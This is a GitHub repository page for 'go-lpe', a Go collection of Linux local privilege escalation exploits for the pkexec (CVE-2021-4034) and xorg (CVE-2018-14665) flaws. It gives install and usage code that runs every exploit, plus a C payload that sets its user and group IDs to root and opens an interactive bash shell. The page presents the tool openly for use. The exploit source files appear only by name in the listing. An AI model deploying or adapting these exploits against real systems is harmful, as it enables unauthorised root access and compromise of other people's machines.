Go-LPE

A collection of LPE exploits written in Go

Exploits

CVE	Description	Link
2021-4034	pkexec exploit rewritten in pure Go that is based on blasty's poc	https://haxx.in/files/blasty-vs-pkexec.c
2018-14665	xorg (a demo) that works in environments with certain xorg versions	https://www.cvedetails.com/cve/CVE-2018-14665

Get Started

go get -u -v github.com/jm33-m0/go-lpe

package main

import (
    golpe "github.com/jm33-m0/go-lpe"
)

func main() {
    golpe.RunAll()
}

// go:build ignore
//  +build ignore
// musl-gcc -static -s -o emp3r0r demo.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  puts("go-lpe has successfully got root!");
  setuid(0);
  seteuid(0);
  setgid(0);
  setegid(0);
  system("/bin/bash -i");
  return 0;
}

Note that this tool tries to execute ./emp3r0r -replace
If you want it to execute other stuff, just write a wrapper

Name		Name	Last commit message	Last commit date
Latest commit History 28 Commits
cmd		cmd
utils		utils
.gitignore		.gitignore
CVE-2018-14665.go		CVE-2018-14665.go
CVE-2021-4034.go		CVE-2021-4034.go
LICENSE		LICENSE
README.md		README.md
blasty-vs-pkexec.go		blasty-vs-pkexec.go
build.sh		build.sh
go.mod		go.mod
run.go		run.go
util.go		util.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

cmd

cmd

utils

utils

.gitignore

.gitignore

CVE-2018-14665.go

CVE-2018-14665.go

CVE-2021-4034.go

CVE-2021-4034.go

LICENSE

LICENSE

README.md

README.md

blasty-vs-pkexec.go

blasty-vs-pkexec.go

build.sh

build.sh

go.mod

go.mod

run.go

run.go

util.go

util.go

Repository files navigation

Go-LPE

Exploits

Get Started

About

Releases 4

Packages

Contributors 2

Languages

License

jm33-m0/go-lpe

Folders and files

Latest commit

History

Repository files navigation

Go-LPE

Exploits

Get Started

About

Topics

Resources

License

Stars

Watchers

Forks

Languages